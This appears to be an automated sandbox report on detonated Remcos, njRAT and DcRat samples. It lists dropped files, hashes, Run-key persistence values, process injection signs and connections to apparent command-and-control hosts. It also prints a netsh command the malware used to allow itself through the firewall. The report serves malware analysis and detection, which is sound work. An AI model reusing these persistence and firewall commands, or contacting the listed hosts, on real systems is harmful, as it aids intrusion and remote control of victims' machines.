C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp |
Files
memory/2096-0-0x000007FEF53E3000-0x000007FEF53E4000-memory.dmp
memory/2096-1-0x0000000000980000-0x00000000009D6000-memory.dmp
C:\Users\Admin\AppData\Roaming\XClient.exe
| MD5 | e0918682feb10b28a39a9cfbf4d2d90c |
| SHA1 | c33f8518747e96955387bac3c8299eea24357fe0 |
| SHA256 | 8f7a69675281f0e5f2fd0b43c64434fdb132fdca1eb82cf23aa947f83c833d01 |
| SHA512 | dcb3961832197bf33b4e554a69b95a17c847fccde7211ca96ee0a9ad975a051f93e6f29a3a9525279b2aaf9d6b7208a8ddeb8c1d430e79ddf4155f5629038fa7 |
memory/2640-13-0x0000000000EF0000-0x0000000000F36000-memory.dmp
C:\Users\Admin\AppData\Roaming\Output.exe
| MD5 | 3ac2fbaa37549eb0c50eedbca0da41c2 |
| SHA1 | a486d241a02989d2adbff9785c7c39e68a2934af |
| SHA256 | 815021055de7349aafb51c6788bfd8f1a0f9fc242e842d6b8bf639283a4658fd |
| SHA512 | 76ac7165eba850a34e9dd459c538e1e0ceaee09896e711dabc1272c76a0a79b0826124cec4c43d626b390c222367af55b3de452312e51725f994d218cbe0e7f7 |
memory/2488-75-0x000007FEF53E0000-0x000007FEF5DCC000-memory.dmp
memory/2488-76-0x000007FEF53E0000-0x000007FEF5DCC000-memory.dmp
memory/2488-16-0x000007FEF53E0000-0x000007FEF5DCC000-memory.dmp
memory/2488-9-0x0000000000EA0000-0x0000000000EB2000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20250207-en
Max time kernel
139s
Max time network
150s
Command Line
Signatures
Remcos
Remcos family
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\Application = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\sbietrcl.exe" | C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2912 set thread context of 3044 | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe
"C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 213.183.58.19:4000 | tcp | |
| RU | 213.183.58.19:4000 | tcp | |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.252.143:80 | crl.microsoft.com | tcp |
| RU | 213.183.58.19:4000 | tcp | |
| RU | 213.183.58.19:4000 | tcp | |
| RU | 213.183.58.19:4000 | tcp | |
| RU | 213.183.58.19:4000 | tcp |
Files
memory/2344-0-0x0000000074E81000-0x0000000074E82000-memory.dmp
memory/2344-8-0x0000000074E80000-0x000000007542B000-memory.dmp
memory/2344-9-0x0000000074E80000-0x000000007542B000-memory.dmp
memory/2344-10-0x0000000074E80000-0x000000007542B000-memory.dmp
memory/2912-29-0x0000000074E80000-0x000000007542B000-memory.dmp
memory/2344-28-0x0000000074E80000-0x000000007542B000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe
| MD5 | 0a18d56f34538070a8a715ec937a8929 |
| SHA1 | 0ae813ceb71e5dc1e4ace6b1def908041bf4b3b4 |
| SHA256 | 8a7e36230788c35f10b15313f478cd339dd30e609bf25d56be769a22a8bc0736 |
| SHA512 | 4264c9e915db1a30901025078828c82c353855f255fbc5ddefe75078dc0f5dc1eaa2a1fe8270c11fc8f051319409fbb2e52938399f51334a43291a7f4a50f8e6 |
C:\Users\Admin\AppData\Local\Temp\CabDDF0.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/2912-37-0x0000000074E80000-0x000000007542B000-memory.dmp
memory/2912-38-0x0000000074E80000-0x000000007542B000-memory.dmp
memory/3044-62-0x0000000000400000-0x0000000000417000-memory.dmp
memory/2912-61-0x0000000074E80000-0x000000007542B000-memory.dmp
memory/3044-60-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3044-59-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3044-56-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3044-55-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3044-52-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3044-50-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/3044-48-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3044-46-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3044-44-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3044-42-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3044-40-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3044-65-0x0000000000400000-0x0000000000417000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20240903-en
Max time kernel
146s
Max time network
147s
Command Line
Signatures
Njrat family
njRAT/Bladabindi
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\confuse = "C:\\Users\\Admin\\AppData\\Roaming\\confuse\\chargeable.exe" | C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysMain = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1a9cd1714a3e518cfd51f84f1be819bf.exe" | C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2436 set thread context of 2832 | N/A | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe
"C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe"
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
"C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe"
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe" "chargeable.exe" ENABLE
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.252.143:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 23.192.18.101:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | doddyfire.linkpc.net | udp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
Files
memory/1792-0-0x0000000074541000-0x0000000074542000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabC6E9.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/1792-1-0x0000000074540000-0x0000000074AEB000-memory.dmp
memory/1792-23-0x0000000074540000-0x0000000074AEB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TarC6EC.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 83142242e97b8953c386f988aa694e4a |
| SHA1 | 833ed12fc15b356136dcdd27c61a50f59c5c7d50 |
| SHA256 | d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755 |
| SHA512 | bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10 |
C:\Users\Admin\AppData\Local\Temp\TarC986.tmp
| MD5 | 109cab5505f5e065b63d01361467a83b |
| SHA1 | 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc |
| SHA256 | ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673 |
| SHA512 | 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 961dcab7b4519de9b2959e37b9acd44d |
| SHA1 | af9819559394cc28e9dace6762ba1ac3a2ab90f6 |
| SHA256 | d91056bfdf292f5b7b1e3fd4fc0da907308c4a8a5a28ede7597dc3b52c816ce4 |
| SHA512 | 0c9bda9646a86489408de99903dce44f42827ce771ebe91efbd4b7475125c9180127d396f729bd48ac61202d1c75784735300f343cdee6f2c81dd0b96ffd45c6 |
memory/1792-184-0x0000000074540000-0x0000000074AEB000-memory.dmp
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
| MD5 | d85ce7c078fad704704709cfdf6cc6cc |
| SHA1 | 11a6f9f84f7dcda89c4ae1a4da2b5e2dbbdd396e |
| SHA256 | 2dcbcee32b967f6559e0aa2d151a0cbedf7f218e25c59437bfc5a27b463ead2d |
| SHA512 | dab904dc1071cce585c2fda5fa70e5acd64985ef3fec7ff3c0f6268dd29d3d687d0d99a607a4a6e5987333e24e98d9740a1d3d942dd410dcb4cc14ee41972870 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C0018BB1B5834735BFA60CD063B31956
| MD5 | 1ea27366e034eb9447a33ce639c01489 |
| SHA1 | d12ed3e7e60c65ce90f0a58b9b9e47292caed923 |
| SHA256 | 788d210ef206a4d11b6b506bf52124ee03fca4e8a9389fad43772202a7e29452 |
| SHA512 | e06f7443f0f7ca5db4411aa0718102c08068e95ec305b6b53c0b42a941a877de39f95c7e7514e69316b41a7ac19eaa6ccddc581fe475bdb842ec920691726e49 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C0018BB1B5834735BFA60CD063B31956
| MD5 | 4ea113be8aaac780e38eebd189c6f4ec |
| SHA1 | 94c79c5ae47fdb125258188bdf8bf5c7647da214 |
| SHA256 | e8cc316fbaab36d49e1fd45afb5888bc6af41d89e4f02866f9f393ed8917fe09 |
| SHA512 | 54699b354150f3eb7db1319e27a9dd6b663396e2183259a6e143c4c4def393498fc797f78896abf0bf4ec3807857b3943ecaed7103d1bf36a379b39c9e80b795 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\37C951188967C8EB88D99893D9D191FE
| MD5 | 3b5e0bd6640456a749d9155e6c135727 |
| SHA1 | 7d985e42e7df8cac3cf7ec917df10b9fbef09a21 |
| SHA256 | c362a3d2b661c6066a02fc169faaa1976c2f6160da5837c7e68b7e0f67b794ed |
| SHA512 | b1b669bad519dccab5224c8fcdb13bb2b015e22fd30ba57e92c9cde4480e655f19f0bbb862db5fd87828d2a3ab74c4a6090f36b6358f9eefe5c82e024afe4a3e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\37C951188967C8EB88D99893D9D191FE
| MD5 | 986d462ad9a78fe82b53b4d11378f7bb |
| SHA1 | 5486751c9cd15b8859d567760d6515051d0266a0 |
| SHA256 | daf8bf7df824637a59589ad97f2939e674f7b6c5ccf0d6186f9214dc14245590 |
| SHA512 | 5cc6fb85ffbb942bd0e01666cf3cc976155fc3f6c683a6ad8d6e44cabdf04d59b16f17772ba5b88f3bfcf3db92cc5053bc8432efe920fe755ac0080fdb99f5c5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 40df535c351f239056edfb75868b5198 |
| SHA1 | 06f70046e3efa59a9fa3803ed7252952087ec38a |
| SHA256 | 0f33b43515d31fb3774c03779fff8a50783eff7521dbc18ff37ec9f555c7ac62 |
| SHA512 | 57c9d6ac831da0ee2bed3cf08500467965fa7e65d2e3bd0af470aac72ffcec43d836f88b80291073650331d82046e14b13bd1ccfb78890c58dd17de38517e813 |
memory/1792-194-0x0000000074540000-0x0000000074AEB000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1e8ee1b4414c537fd2a8de0f8b2a055a |
| SHA1 | 756824cedb7593bbd72d66adf74e81ed2e93cca8 |
| SHA256 | e42360a439b896ac6c8e24befa7114900f2455eae37c8794d2289bc0f70fba77 |
| SHA512 | 000db366827f53bfd4b6e9624c03337c49ca406dd871f4363d46d93ee03b9e233ab8ed8aa334173668e8a8d4a671337564dbd5c2ddf2151cfed5e87cd8885368 |
memory/2832-366-0x0000000000400000-0x000000000040C000-memory.dmp
memory/2832-365-0x0000000000400000-0x000000000040C000-memory.dmp
memory/2832-363-0x0000000000400000-0x000000000040C000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20250207-en
Max time kernel
117s
Max time network
120s
Command Line
Signatures
DcRat
Dcrat family
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1bb302f6b26022b9f405c4a06c165b236837688e94ea312a231c8f780e63d2b3.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1bb302f6b26022b9f405c4a06c165b236837688e94ea312a231c8f780e63d2b3.exe
"C:\Users\Admin\AppData\Local\Temp\1bb302f6b26022b9f405c4a06c165b236837688e94ea312a231c8f780e63d2b3.exe"
Network
Files
memory/2596-0-0x000007FEF5EA3000-0x000007FEF5EA4000-memory.dmp
memory/2596-1-0x0000000000280000-0x000000000048A000-memory.dmp
memory/2596-2-0x000007FEF5EA0000-0x000007FEF688C000-memory.dmp
memory/2596-3-0x0000000000250000-0x000000000025E000-memory.dmp
memory/2596-4-0x0000000000260000-0x000000000026E000-memory.dmp
memory/2596-5-0x000007FEF5EA0000-0x000007FEF688C000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
147s
Max time network
148s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
